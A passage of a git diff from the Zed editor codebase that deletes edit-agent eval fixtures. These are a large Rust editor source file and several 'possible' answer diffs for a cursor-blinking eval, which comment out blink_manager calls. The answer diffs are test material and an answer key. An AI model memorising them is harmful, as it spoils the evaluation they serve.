this.fold_at(buffer_row, window, cx); - } - })) - .into_any_element(), - ) - } else { - None - } - } - - pub fn render_crease_trailer( - &self, - buffer_row: MultiBufferRow, - window: &mut Window, - cx: &mut App, - ) -> Option { - let folded = self.is_line_folded(buffer_row); - if let Crease::Inline { render_trailer, .. } = self - .crease_snapshot - .query_row(buffer_row, &self.buffer_snapshot)? - { - let render_trailer = render_trailer.as_ref()?; - Some(render_trailer(buffer_row, folded, window, cx)) - } else { - None - } - } -} - -impl Deref for EditorSnapshot { - type Target = DisplaySnapshot; - - fn deref(&self) -> &Self::Target { - &self.display_snapshot - } -} - -#[derive(Clone, Debug, PartialEq, Eq)] -pub enum EditorEvent { - InputIgnored { - text: Arc, - }, - InputHandled { - utf16_range_to_replace: Option>, - text: Arc, - }, - ExcerptsAdded { - buffer: Entity, - predecessor: ExcerptId, - excerpts: Vec<(ExcerptId, ExcerptRange)>, - }, - ExcerptsRemoved { - ids: Vec, - removed_buffer_ids: Vec, - }, - BufferFoldToggled { - ids: Vec, - folded: bool, - }, - ExcerptsEdited { - ids: Vec, - }, - ExcerptsExpanded { - ids: Vec, - }, - BufferEdited, - Edited { - transaction_id: clock::Lamport, - }, - Reparsed(BufferId), - Focused, - FocusedIn, - Blurred, - DirtyChanged, - Saved, - TitleChanged, - DiffBaseChanged, - SelectionsChanged { - local: bool, - }, - ScrollPositionChanged { - local: bool, - autoscroll: bool, - }, - Closed, - TransactionUndone { - transaction_id: clock::Lamport, - }, - TransactionBegun { - transaction_id: clock::Lamport, - }, - Reloaded, - CursorShapeChanged, - PushedToNavHistory { - anchor: Anchor, - is_deactivate: bool, - }, -} - -impl EventEmitter for Editor {} - -impl Focusable for Editor { - fn focus_handle(&self, _cx: &App) -> FocusHandle { - self.focus_handle.clone() - } -} - -impl Render for Editor { - fn render(&mut self, _: &mut Window, cx: &mut Context) -> impl IntoElement { - let settings = ThemeSettings::get_global(cx); - - let mut text_style = match self.mode { - EditorMode::SingleLine { .. } | EditorMode::AutoHeight { .. } => TextStyle { - color: cx.theme().colors().editor_foreground, - font_family: settings.ui_font.family.clone(), - font_features: settings.ui_font.features.clone(), - font_fallbacks: settings.ui_font.fallbacks.clone(), - font_size: rems(0.875).into(), - font_weight: settings.ui_font.weight, - line_height: relative(settings.buffer_line_height.value()), - ..Default::default() - }, - EditorMode::Full { .. } => TextStyle { - color: cx.theme().colors().editor_foreground, - font_family: settings.buffer_font.family.clone(), - font_features: settings.buffer_font.features.clone(), - font_fallbacks: settings.buffer_font.fallbacks.clone(), - font_size: settings.buffer_font_size(cx).into(), - font_weight: settings.buffer_font.weight, - line_height: relative(settings.buffer_line_height.value()), - ..Default::default() - }, - }; - if let Some(text_style_refinement) = &self.text_style_refinement { - text_style.refine(text_style_refinement) - } - - let background = match self.mode { - EditorMode::SingleLine { .. } => cx.theme().system().transparent, - EditorMode::AutoHeight { max_lines: _ } => cx.theme().system().transparent, - EditorMode::Full { .. } => cx.theme().colors().editor_background, - }; - - EditorElement::new( - &cx.entity(), - EditorStyle { - background, - local_player: cx.theme().players().local(), - text: text_style, - scrollbar_width: EditorElement::SCROLLBAR_WIDTH, - syntax: cx.theme().syntax().clone(), - status: cx.theme().status().clone(), - inlay_hints_style: make_inlay_hints_style(cx), - inline_completion_styles: make_suggestion_styles(cx), - unnecessary_code_fade: ThemeSettings::get_global(cx).unnecessary_code_fade, - }, - ) - } -} - -impl EntityInputHandler for Editor { - fn text_for_range( - &mut self, - range_utf16: Range, - adjusted_range: &mut Option>, - _: &mut Window, - cx: &mut Context, - ) -> Option { - let snapshot = self.buffer.read(cx).read(cx); - let start = snapshot.clip_offset_utf16(OffsetUtf16(range_utf16.start), Bias::Left); - let end = snapshot.clip_offset_utf16(OffsetUtf16(range_utf16.end), Bias::Right); - if (start.0..end.0) != range_utf16 { - adjusted_range.replace(start.0..end.0); - } - Some(snapshot.text_for_range(start..end).collect()) - } - - fn selected_text_range( - &mut self, - ignore_disabled_input: bool, - _: &mut Window, - cx: &mut Context, - ) -> Option { - // Prevent the IME menu from appearing when holding down an alphabetic key - // while input is disabled. - if !ignore_disabled_input && !self.input_enabled { - return None; - } - - let selection = self.selections.newest::(cx); - let range = selection.range(); - - Some(UTF16Selection { - range: range.start.0..range.end.0, - reversed: selection.reversed, - }) - } - - fn marked_text_range(&self, _: &mut Window, cx: &mut Context) -> Option> { - let snapshot = self.buffer.read(cx).read(cx); - let range = self.text_highlights::(cx)?.1.first()?; - Some(range.start.to_offset_utf16(&snapshot).0..range.end.to_offset_utf16(&snapshot).0) - } - - fn unmark_text(&mut self, _: &mut Window, cx: &mut Context) { - self.clear_highlights::(cx); - self.ime_transaction.take(); - } - - fn replace_text_in_range( - &mut self, - range_utf16: Option>, - text: &str, - window: &mut Window, - cx: &mut Context, - ) { - if !self.input_enabled { - cx.emit(EditorEvent::InputIgnored { text: text.into() }); - return; - } - - self.transact(window, cx, |this, window, cx| { - let new_selected_ranges = if let Some(range_utf16) = range_utf16 { - let range_utf16 = OffsetUtf16(range_utf16.start)..OffsetUtf16(range_utf16.end); - Some(this.selection_replacement_ranges(range_utf16, cx)) - } else { - this.marked_text_ranges(cx) - }; - - let range_to_replace = new_selected_ranges.as_ref().and_then(|ranges_to_replace| { - let newest_selection_id = this.selections.newest_anchor().id; - this.selections - .all::(cx) - .iter() - .zip(ranges_to_replace.iter()) - .find_map(|(selection, range)| { - if selection.id == newest_selection_id { - Some( - (range.start.0 as isize - selection.head().0 as isize) - ..(range.end.0 as isize - selection.head().0 as isize), - ) - } else { - None - } - }) - }); - - cx.emit(EditorEvent::InputHandled { - utf16_range_to_replace: range_to_replace, - text: text.into(), - }); - - if let Some(new_selected_ranges) = new_selected_ranges { - this.change_selections(None, window, cx, |selections| { - selections.select_ranges(new_selected_ranges) - }); - this.backspace(&Default::default(), window, cx); - } - - this.handle_input(text, window, cx); - }); - - if let Some(transaction) = self.ime_transaction { - self.buffer.update(cx, |buffer, cx| { - buffer.group_until_transaction(transaction, cx); - }); - } - - self.unmark_text(window, cx); - } - - fn replace_and_mark_text_in_range( - &mut self, - range_utf16: Option>, - text: &str, - new_selected_range_utf16: Option>, - window: &mut Window, - cx: &mut Context, - ) { - if !self.input_enabled { - return; - } - - let transaction = self.transact(window, cx, |this, window, cx| { - let ranges_to_replace = if let Some(mut marked_ranges) = this.marked_text_ranges(cx) { - let snapshot = this.buffer.read(cx).read(cx); - if let Some(relative_range_utf16) = range_utf16.as_ref() { - for marked_range in &mut marked_ranges { - marked_range.end.0 = marked_range.start.0 + relative_range_utf16.end; - marked_range.start.0 += relative_range_utf16.start; - marked_range.start = - snapshot.clip_offset_utf16(marked_range.start, Bias::Left); - marked_range.end = - snapshot.clip_offset_utf16(marked_range.end, Bias::Right); - } - } - Some(marked_ranges) - } else if let Some(range_utf16) = range_utf16 { - let range_utf16 = OffsetUtf16(range_utf16.start)..OffsetUtf16(range_utf16.end); - Some(this.selection_replacement_ranges(range_utf16, cx)) - } else { - None - }; - - let range_to_replace = ranges_to_replace.as_ref().and_then(|ranges_to_replace| { - let newest_selection_id = this.selections.newest_anchor().id; - this.selections - .all::(cx) - .iter() - .zip(ranges_to_replace.iter()) - .find_map(|(selection, range)| { - if selection.id == newest_selection_id { - Some( - (range.start.0 as isize - selection.head().0 as isize) - ..(range.end.0 as isize - selection.head().0 as isize), - ) - } else { - None - } - }) - }); - - cx.emit(EditorEvent::InputHandled { - utf16_range_to_replace: range_to_replace, - text: text.into(), - }); - - if let Some(ranges) = ranges_to_replace { - this.change_selections(None, window, cx, |s| s.select_ranges(ranges)); - } - - let marked_ranges = { - let snapshot = this.buffer.read(cx).read(cx); - this.selections - .disjoint_anchors() - .iter() - .map(|selection| { - selection.start.bias_left(&snapshot)..selection.end.bias_right(&snapshot) - }) - .collect::>() - }; - - if text.is_empty() { - this.unmark_text(window, cx); - } else { - this.highlight_text::( - marked_ranges.clone(), - HighlightStyle { - underline: Some(UnderlineStyle { - thickness: px(1.), - color: None, - wavy: false, - }), - ..Default::default() - }, - cx, - ); - } - - // Disable auto-closing when composing text (i.e. typing a `"` on a Brazilian keyboard) - let use_autoclose = this.use_autoclose; - let use_auto_surround = this.use_auto_surround; - this.set_use_autoclose(false); - this.set_use_auto_surround(false); - this.handle_input(text, window, cx); - this.set_use_autoclose(use_autoclose); - this.set_use_auto_surround(use_auto_surround); - - if let Some(new_selected_range) = new_selected_range_utf16 { - let snapshot = this.buffer.read(cx).read(cx); - let new_selected_ranges = marked_ranges - .into_iter() - .map(|marked_range| { - let insertion_start = marked_range.start.to_offset_utf16(&snapshot).0; - let new_start = OffsetUtf16(new_selected_range.start + insertion_start); - let new_end = OffsetUtf16(new_selected_range.end + insertion_start); - snapshot.clip_offset_utf16(new_start, Bias::Left) - ..snapshot.clip_offset_utf16(new_end, Bias::Right) - }) - .collect::>(); - - drop(snapshot); - this.change_selections(None, window, cx, |selections| { - selections.select_ranges(new_selected_ranges) - }); - } - }); - - self.ime_transaction = self.ime_transaction.or(transaction); - if let Some(transaction) = self.ime_transaction { - self.buffer.update(cx, |buffer, cx| { - buffer.group_until_transaction(transaction, cx); - }); - } - - if self.text_highlights::(cx).is_none() { - self.ime_transaction.take(); - } - } - - fn bounds_for_range( - &mut self, - range_utf16: Range, - element_bounds: gpui::Bounds, - window: &mut Window, - cx: &mut Context, - ) -> Option> { - let text_layout_details = self.text_layout_details(window); - let gpui::Size { - width: em_width, - height: line_height, - } = self.character_size(window); - - let snapshot = self.snapshot(window, cx); - let scroll_position = snapshot.scroll_position(); - let scroll_left = scroll_position.x * em_width; - - let start = OffsetUtf16(range_utf16.start).to_display_point(&snapshot); - let x = snapshot.x_for_display_point(start, &text_layout_details) - scroll_left - + self.gutter_dimensions.width - + self.gutter_dimensions.margin; - let y = line_height * (start.row().as_f32() - scroll_position.y); - - Some(Bounds { - origin: element_bounds.origin + point(x, y), - size: size(em_width, line_height), - }) - } - - fn character_index_for_point( - &mut self, - point: gpui::Point, - _window: &mut Window, - _cx: &mut Context, - ) -> Option { - let position_map = self.last_position_map.as_ref()?; - if !position_map.text_hitbox.contains(&point) { - return None; - } - let display_point = position_map.point_for_position(point).previous_valid; - let anchor = position_map - .snapshot - .display_point_to_anchor(display_point, Bias::Left); - let utf16_offset = anchor.to_offset_utf16(&position_map.snapshot.buffer_snapshot); - Some(utf16_offset.0) - } -} - -trait SelectionExt { - fn display_range(&self, map: &DisplaySnapshot) -> Range; - fn spanned_rows( - &self, - include_end_if_at_line_start: bool, - map: &DisplaySnapshot, - ) -> Range; -} - -impl SelectionExt for Selection { - fn display_range(&self, map: &DisplaySnapshot) -> Range { - let start = self - .start - .to_point(&map.buffer_snapshot) - .to_display_point(map); - let end = self - .end - .to_point(&map.buffer_snapshot) - .to_display_point(map); - if self.reversed { - end..start - } else { - start..end - } - } - - fn spanned_rows( - &self, - include_end_if_at_line_start: bool, - map: &DisplaySnapshot, - ) -> Range { - let start = self.start.to_point(&map.buffer_snapshot); - let mut end = self.end.to_point(&map.buffer_snapshot); - if !include_end_if_at_line_start && start.row != end.row && end.column == 0 { - end.row -= 1; - } - - let buffer_start = map.prev_line_boundary(start).0; - let buffer_end = map.next_line_boundary(end).0; - MultiBufferRow(buffer_start.row)..MultiBufferRow(buffer_end.row + 1) - } -} - -impl InvalidationStack { - fn invalidate(&mut self, selections: &[Selection], buffer: &MultiBufferSnapshot) - where - S: Clone + ToOffset, - { - while let Some(region) = self.last() { - let all_selections_inside_invalidation_ranges = - if selections.len() == region.ranges().len() { - selections - .iter() - .zip(region.ranges().iter().map(|r| r.to_offset(buffer))) - .all(|(selection, invalidation_range)| { - let head = selection.head().to_offset(buffer); - invalidation_range.start <= head && invalidation_range.end >= head - }) - } else { - false - }; - - if all_selections_inside_invalidation_ranges { - break; - } else { - self.pop(); - } - } - } -} - -impl Default for InvalidationStack { - fn default() -> Self { - Self(Default::default()) - } -} - -impl Deref for InvalidationStack { - type Target = Vec; - - fn deref(&self) -> &Self::Target { - &self.0 - } -} - -impl DerefMut for InvalidationStack { - fn deref_mut(&mut self) -> &mut Self::Target { - &mut self.0 - } -} - -impl InvalidationRegion for SnippetState { - fn ranges(&self) -> &[Range] { - &self.ranges[self.active_index] - } -} - -fn inline_completion_edit_text( - current_snapshot: &BufferSnapshot, - edits: &[(Range, String)], - edit_preview: &EditPreview, - include_deletions: bool, - cx: &App, -) -> HighlightedText { - let edits = edits - .iter() - .map(|(anchor, text)| { - ( - anchor.start.text_anchor..anchor.end.text_anchor, - text.clone(), - ) - }) - .collect::>(); - - edit_preview.highlight_edits(current_snapshot, &edits, include_deletions, cx) -} - -pub fn diagnostic_style(severity: DiagnosticSeverity, colors: &StatusColors) -> Hsla { - match severity { - DiagnosticSeverity::ERROR => colors.error, - DiagnosticSeverity::WARNING => colors.warning, - DiagnosticSeverity::INFORMATION => colors.info, - DiagnosticSeverity::HINT => colors.info, - _ => colors.ignored, - } -} - -pub fn styled_runs_for_code_label<'a>( - label: &'a CodeLabel, - syntax_theme: &'a theme::SyntaxTheme, -) -> impl 'a + Iterator, HighlightStyle)> { - let fade_out = HighlightStyle { - fade_out: Some(0.35), - ..Default::default() - }; - - let mut prev_end = label.filter_range.end; - label - .runs - .iter() - .enumerate() - .flat_map(move |(ix, (range, highlight_id))| { - let style = if let Some(style) = highlight_id.style(syntax_theme) { - style - } else { - return Default::default(); - }; - let mut muted_style = style; - muted_style.highlight(fade_out); - - let mut runs = SmallVec::<[(Range, HighlightStyle); 3]>::new(); - if range.start >= label.filter_range.end { - if range.start > prev_end { - runs.push((prev_end..range.start, fade_out)); - } - runs.push((range.clone(), muted_style)); - } else if range.end <= label.filter_range.end { - runs.push((range.clone(), style)); - } else { - runs.push((range.start..label.filter_range.end, style)); - runs.push((label.filter_range.end..range.end, muted_style)); - } - prev_end = cmp::max(prev_end, range.end); - - if ix + 1 == label.runs.len() && label.text.len() > prev_end { - runs.push((prev_end..label.text.len(), fade_out)); - } - - runs - }) -} - -pub(crate) fn split_words(text: &str) -> impl std::iter::Iterator + '_ { - let mut prev_index = 0; - let mut prev_codepoint: Option = None; - text.char_indices() - .chain([(text.len(), '\0')]) - .filter_map(move |(index, codepoint)| { - let prev_codepoint = prev_codepoint.replace(codepoint)?; - let is_boundary = index == text.len() - || !prev_codepoint.is_uppercase() && codepoint.is_uppercase() - || !prev_codepoint.is_alphanumeric() && codepoint.is_alphanumeric(); - if is_boundary { - let chunk = &text[prev_index..index]; - prev_index = index; - Some(chunk) - } else { - None - } - }) -} - -pub trait RangeToAnchorExt: Sized { - fn to_anchors(self, snapshot: &MultiBufferSnapshot) -> Range; - - fn to_display_points(self, snapshot: &EditorSnapshot) -> Range { - let anchor_range = self.to_anchors(&snapshot.buffer_snapshot); - anchor_range.start.to_display_point(snapshot)..anchor_range.end.to_display_point(snapshot) - } -} - -impl RangeToAnchorExt for Range { - fn to_anchors(self, snapshot: &MultiBufferSnapshot) -> Range { - let start_offset = self.start.to_offset(snapshot); - let end_offset = self.end.to_offset(snapshot); - if start_offset == end_offset { - snapshot.anchor_before(start_offset)..snapshot.anchor_before(end_offset) - } else { - snapshot.anchor_after(self.start)..snapshot.anchor_before(self.end) - } - } -} - -pub trait RowExt { - fn as_f32(&self) -> f32; - - fn next_row(&self) -> Self; - - fn previous_row(&self) -> Self; - - fn minus(&self, other: Self) -> u32; -} - -impl RowExt for DisplayRow { - fn as_f32(&self) -> f32 { - self.0 as f32 - } - - fn next_row(&self) -> Self { - Self(self.0 + 1) - } - - fn previous_row(&self) -> Self { - Self(self.0.saturating_sub(1)) - } - - fn minus(&self, other: Self) -> u32 { - self.0 - other.0 - } -} - -impl RowExt for MultiBufferRow { - fn as_f32(&self) -> f32 { - self.0 as f32 - } - - fn next_row(&self) -> Self { - Self(self.0 + 1) - } - - fn previous_row(&self) -> Self { - Self(self.0.saturating_sub(1)) - } - - fn minus(&self, other: Self) -> u32 { - self.0 - other.0 - } -} - -trait RowRangeExt { - type Row; - - fn len(&self) -> usize; - - fn iter_rows(&self) -> impl DoubleEndedIterator; -} - -impl RowRangeExt for Range { - type Row = MultiBufferRow; - - fn len(&self) -> usize { - (self.end.0 - self.start.0) as usize - } - - fn iter_rows(&self) -> impl DoubleEndedIterator { - (self.start.0..self.end.0).map(MultiBufferRow) - } -} - -impl RowRangeExt for Range { - type Row = DisplayRow; - - fn len(&self) -> usize { - (self.end.0 - self.start.0) as usize - } - - fn iter_rows(&self) -> impl DoubleEndedIterator { - (self.start.0..self.end.0).map(DisplayRow) - } -} - -/// If select range has more than one line, we -/// just point the cursor to range.start. -fn collapse_multiline_range(range: Range) -> Range { - if range.start.row == range.end.row { - range - } else { - range.start..range.start - } -} -pub struct KillRing(ClipboardItem); -impl Global for KillRing {} - -const UPDATE_DEBOUNCE: Duration = Duration::from_millis(50); - -enum BreakpointPromptEditAction { - Log, - Condition, - HitCondition, -} - -struct BreakpointPromptEditor { - pub(crate) prompt: Entity, - editor: WeakEntity, - breakpoint_anchor: Anchor, - breakpoint: Breakpoint, - edit_action: BreakpointPromptEditAction, - block_ids: HashSet, - gutter_dimensions: Arc>, - _subscriptions: Vec, -} - -impl BreakpointPromptEditor { - const MAX_LINES: u8 = 4; - - fn new( - editor: WeakEntity, - breakpoint_anchor: Anchor, - breakpoint: Breakpoint, - edit_action: BreakpointPromptEditAction, - window: &mut Window, - cx: &mut Context, - ) -> Self { - let base_text = match edit_action { - BreakpointPromptEditAction::Log => breakpoint.message.as_ref(), - BreakpointPromptEditAction::Condition => breakpoint.condition.as_ref(), - BreakpointPromptEditAction::HitCondition => breakpoint.hit_condition.as_ref(), - } - .map(|msg| msg.to_string()) - .unwrap_or_default(); - - let buffer = cx.new(|cx| Buffer::local(base_text, cx)); - let buffer = cx.new(|cx| MultiBuffer::singleton(buffer, cx)); - - let prompt = cx.new(|cx| { - let mut prompt = Editor::new( - EditorMode::AutoHeight { - max_lines: Self::MAX_LINES as usize, - }, - buffer, - None, - window, - cx, - ); - prompt.set_soft_wrap_mode(language::language_settings::SoftWrap::EditorWidth, cx); - prompt.set_show_cursor_when_unfocused(false, cx); - prompt.set_placeholder_text( - match edit_action { - BreakpointPromptEditAction::Log => "Message to log when a breakpoint is hit. Expressions within {} are interpolated.", - BreakpointPromptEditAction::Condition => "Condition when a breakpoint is hit. Expressions within {} are interpolated.", - BreakpointPromptEditAction::HitCondition => "How many breakpoint hits to ignore", - }, - cx, - ); - - prompt - }); - - Self { - prompt, - editor, - breakpoint_anchor, - breakpoint, - edit_action, - gutter_dimensions: Arc::new(Mutex::new(GutterDimensions::default())), - block_ids: Default::default(), - _subscriptions: vec![], - } - } - - pub(crate) fn add_block_ids(&mut self, block_ids: Vec) { - self.block_ids.extend(block_ids) - } - - fn confirm(&mut self, _: &menu::Confirm, window: &mut Window, cx: &mut Context) { - if let Some(editor) = self.editor.upgrade() { - let message = self - .prompt - .read(cx) - .buffer - .read(cx) - .as_singleton() - .expect("A multi buffer in breakpoint prompt isn't possible") - .read(cx) - .as_rope() - .to_string(); - - editor.update(cx, |editor, cx| { - editor.edit_breakpoint_at_anchor( - self.breakpoint_anchor, - self.breakpoint.clone(), - match self.edit_action { - BreakpointPromptEditAction::Log => { - BreakpointEditAction::EditLogMessage(message.into()) - } - BreakpointPromptEditAction::Condition => { - BreakpointEditAction::EditCondition(message.into()) - } - BreakpointPromptEditAction::HitCondition => { - BreakpointEditAction::EditHitCondition(message.into()) - } - }, - cx, - ); - - editor.remove_blocks(self.block_ids.clone(), None, cx); - cx.focus_self(window); - }); - } - } - - fn cancel(&mut self, _: &menu::Cancel, window: &mut Window, cx: &mut Context) { - self.editor - .update(cx, |editor, cx| { - editor.remove_blocks(self.block_ids.clone(), None, cx); - window.focus(&editor.focus_handle); - }) - .log_err(); - } - - fn render_prompt_editor(&self, cx: &mut Context) -> impl IntoElement { - let settings = ThemeSettings::get_global(cx); - let text_style = TextStyle { - color: if self.prompt.read(cx).read_only(cx) { - cx.theme().colors().text_disabled - } else { - cx.theme().colors().text - }, - font_family: settings.buffer_font.family.clone(), - font_fallbacks: settings.buffer_font.fallbacks.clone(), - font_size: settings.buffer_font_size(cx).into(), - font_weight: settings.buffer_font.weight, - line_height: relative(settings.buffer_line_height.value()), - ..Default::default() - }; - EditorElement::new( - &self.prompt, - EditorStyle { - background: cx.theme().colors().editor_background, - local_player: cx.theme().players().local(), - text: text_style, - ..Default::default() - }, - ) - } -} - -impl Render for BreakpointPromptEditor { - fn render(&mut self, window: &mut Window, cx: &mut Context) -> impl IntoElement { - let gutter_dimensions = *self.gutter_dimensions.lock(); - h_flex() - .key_context("Editor") - .bg(cx.theme().colors().editor_background) - .border_y_1() - .border_color(cx.theme().status().info_border) - .size_full() - .py(window.line_height() / 2.5) - .on_action(cx.listener(Self::confirm)) - .on_action(cx.listener(Self::cancel)) - .child(h_flex().w(gutter_dimensions.full_width() + (gutter_dimensions.margin / 2.0))) - .child(div().flex_1().child(self.render_prompt_editor(cx))) - } -} - -impl Focusable for BreakpointPromptEditor { - fn focus_handle(&self, cx: &App) -> FocusHandle { - self.prompt.focus_handle(cx) - } -} - -fn all_edits_insertions_or_deletions( - edits: &Vec<(Range, String)>, - snapshot: &MultiBufferSnapshot, -) -> bool { - let mut all_insertions = true; - let mut all_deletions = true; - - for (range, new_text) in edits.iter() { - let range_is_empty = range.to_offset(&snapshot).is_empty(); - let text_is_empty = new_text.is_empty(); - - if range_is_empty != text_is_empty { - if range_is_empty { - all_deletions = false; - } else { - all_insertions = false; - } - } else { - return false; - } - - if !all_insertions && !all_deletions { - return false; - } - } - all_insertions || all_deletions -} - -struct MissingEditPredictionKeybindingTooltip; - -impl Render for MissingEditPredictionKeybindingTooltip { - fn render(&mut self, window: &mut Window, cx: &mut Context) -> impl IntoElement { - ui::tooltip_container(window, cx, |container, _, cx| { - container - .flex_shrink_0() - .max_w_80() - .min_h(rems_from_px(124.)) - .justify_between() - .child( - v_flex() - .flex_1() - .text_ui_sm(cx) - .child(Label::new("Conflict with Accept Keybinding")) - .child("Your keymap currently overrides the default accept keybinding. To continue, assign one keybinding for the `editor::AcceptEditPrediction` action.") - ) - .child( - h_flex() - .pb_1() - .gap_1() - .items_end() - .w_full() - .child(Button::new("open-keymap", "Assign Keybinding").size(ButtonSize::Compact).on_click(|_ev, window, cx| { - window.dispatch_action(zed_actions::OpenKeymap.boxed_clone(), cx) - })) - .child(Button::new("see-docs", "See Docs").size(ButtonSize::Compact).on_click(|_ev, _window, cx| { - cx.open_url("https://zed.dev/docs/completions#edit-predictions-missing-keybinding"); - })), - ) - }) - } -} - -#[derive(Debug, Clone, Copy, PartialEq)] -pub struct LineHighlight { - pub background: Background, - pub border: Option, - pub include_gutter: bool, - pub type_id: Option, -} - -fn render_diff_hunk_controls( - row: u32, - status: &DiffHunkStatus, - hunk_range: Range, - is_created_file: bool, - line_height: Pixels, - editor: &Entity, - _window: &mut Window, - cx: &mut App, -) -> AnyElement { - h_flex() - .h(line_height) - .mr_1() - .gap_1() - .px_0p5() - .pb_1() - .border_x_1() - .border_b_1() - .border_color(cx.theme().colors().border_variant) - .rounded_b_lg() - .bg(cx.theme().colors().editor_background) - .gap_1() - .occlude() - .shadow_md() - .child(if status.has_secondary_hunk() { - Button::new(("stage", row as u64), "Stage") - .alpha(if status.is_pending() { 0.66 } else { 1.0 }) - .tooltip({ - let focus_handle = editor.focus_handle(cx); - move |window, cx| { - Tooltip::for_action_in( - "Stage Hunk", - &::git::ToggleStaged, - &focus_handle, - window, - cx, - ) - } - }) - .on_click({ - let editor = editor.clone(); - move |_event, _window, cx| { - editor.update(cx, |editor, cx| { - editor.stage_or_unstage_diff_hunks( - true, - vec![hunk_range.start..hunk_range.start], - cx, - ); - }); - } - }) - } else { - Button::new(("unstage", row as u64), "Unstage") - .alpha(if status.is_pending() { 0.66 } else { 1.0 }) - .tooltip({ - let focus_handle = editor.focus_handle(cx); - move |window, cx| { - Tooltip::for_action_in( - "Unstage Hunk", - &::git::ToggleStaged, - &focus_handle, - window, - cx, - ) - } - }) - .on_click({ - let editor = editor.clone(); - move |_event, _window, cx| { - editor.update(cx, |editor, cx| { - editor.stage_or_unstage_diff_hunks( - false, - vec![hunk_range.start..hunk_range.start], - cx, - ); - }); - } - }) - }) - .child( - Button::new(("restore", row as u64), "Restore") - .tooltip({ - let focus_handle = editor.focus_handle(cx); - move |window, cx| { - Tooltip::for_action_in( - "Restore Hunk", - &::git::Restore, - &focus_handle, - window, - cx, - ) - } - }) - .on_click({ - let editor = editor.clone(); - move |_event, window, cx| { - editor.update(cx, |editor, cx| { - let snapshot = editor.snapshot(window, cx); - let point = hunk_range.start.to_point(&snapshot.buffer_snapshot); - editor.restore_hunks_in_ranges(vec![point..point], window, cx); - }); - } - }) - .disabled(is_created_file), - ) - .when( - !editor.read(cx).buffer().read(cx).all_diff_hunks_expanded(), - |el| { - el.child( - IconButton::new(("next-hunk", row as u64), IconName::ArrowDown) - .shape(IconButtonShape::Square) - .icon_size(IconSize::Small) - // .disabled(!has_multiple_hunks) - .tooltip({ - let focus_handle = editor.focus_handle(cx); - move |window, cx| { - Tooltip::for_action_in( - "Next Hunk", - &GoToHunk, - &focus_handle, - window, - cx, - ) - } - }) - .on_click({ - let editor = editor.clone(); - move |_event, window, cx| { - editor.update(cx, |editor, cx| { - let snapshot = editor.snapshot(window, cx); - let position = - hunk_range.end.to_point(&snapshot.buffer_snapshot); - editor.go_to_hunk_before_or_after_position( - &snapshot, - position, - Direction::Next, - window, - cx, - ); - editor.expand_selected_diff_hunks(cx); - }); - } - }), - ) - .child( - IconButton::new(("prev-hunk", row as u64), IconName::ArrowUp) - .shape(IconButtonShape::Square) - .icon_size(IconSize::Small) - // .disabled(!has_multiple_hunks) - .tooltip({ - let focus_handle = editor.focus_handle(cx); - move |window, cx| { - Tooltip::for_action_in( - "Previous Hunk", - &GoToPreviousHunk, - &focus_handle, - window, - cx, - ) - } - }) - .on_click({ - let editor = editor.clone(); - move |_event, window, cx| { - editor.update(cx, |editor, cx| { - let snapshot = editor.snapshot(window, cx); - let point = - hunk_range.start.to_point(&snapshot.buffer_snapshot); - editor.go_to_hunk_before_or_after_position( - &snapshot, - point, - Direction::Prev, - window, - cx, - ); - editor.expand_selected_diff_hunks(cx); - }); - } - }), - ) - }, - ) - .into_any_element() -} diff --git a/crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/possible-01.diff b/crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/possible-01.diff deleted file mode 100644 index 1a38a1967f94c9..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/possible-01.diff +++ /dev/null @@ -1,28 +0,0 @@ ---- before.rs 2025-07-07 11:37:48.434629001 +0300 -+++ expected.rs 2025-07-14 10:33:53.346906775 +0300 -@@ -1780,11 +1780,11 @@ - cx.observe_window_activation(window, |editor, window, cx| { - let active = window.is_window_active(); - editor.blink_manager.update(cx, |blink_manager, cx| { -- if active { -- blink_manager.enable(cx); -- } else { -- blink_manager.disable(cx); -- } -+ // if active { -+ // blink_manager.enable(cx); -+ // } else { -+ // blink_manager.disable(cx); -+ // } - }); - }), - ], -@@ -18463,7 +18463,7 @@ - } - - self.blink_manager.update(cx, |blink_manager, cx| { -- blink_manager.enable(cx); -+ // blink_manager.enable(cx); - }); - self.show_cursor_names(window, cx); - self.buffer.update(cx, |buffer, cx| { diff --git a/crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/possible-02.diff b/crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/possible-02.diff deleted file mode 100644 index b484cce48f71b2..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/possible-02.diff +++ /dev/null @@ -1,29 +0,0 @@ -@@ -1778,13 +1778,13 @@ - cx.observe_global_in::(window, Self::settings_changed), - observe_buffer_font_size_adjustment(cx, |_, cx| cx.notify()), - cx.observe_window_activation(window, |editor, window, cx| { -- let active = window.is_window_active(); -+ // let active = window.is_window_active(); - editor.blink_manager.update(cx, |blink_manager, cx| { -- if active { -- blink_manager.enable(cx); -- } else { -- blink_manager.disable(cx); -- } -+ // if active { -+ // blink_manager.enable(cx); -+ // } else { -+ // blink_manager.disable(cx); -+ // } - }); - }), - ], -@@ -18463,7 +18463,7 @@ - } - - self.blink_manager.update(cx, |blink_manager, cx| { -- blink_manager.enable(cx); -+ // blink_manager.enable(cx); - }); - self.show_cursor_names(window, cx); - self.buffer.update(cx, |buffer, cx| { diff --git a/crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/possible-03.diff b/crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/possible-03.diff deleted file mode 100644 index 431e34e48a250b..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/possible-03.diff +++ /dev/null @@ -1,34 +0,0 @@ -@@ -1774,17 +1774,17 @@ - cx.observe(&buffer, Self::on_buffer_changed), - cx.subscribe_in(&buffer, window, Self::on_buffer_event), - cx.observe_in(&display_map, window, Self::on_display_map_changed), -- cx.observe(&blink_manager, |_, _, cx| cx.notify()), -+ // cx.observe(&blink_manager, |_, _, cx| cx.notify()), - cx.observe_global_in::(window, Self::settings_changed), - observe_buffer_font_size_adjustment(cx, |_, cx| cx.notify()), - cx.observe_window_activation(window, |editor, window, cx| { -- let active = window.is_window_active(); -+ // let active = window.is_window_active(); - editor.blink_manager.update(cx, |blink_manager, cx| { -- if active { -- blink_manager.enable(cx); -- } else { -- blink_manager.disable(cx); -- } -+ // if active { -+ // blink_manager.enable(cx); -+ // } else { -+ // blink_manager.disable(cx); -+ // } - }); - }), - ], -@@ 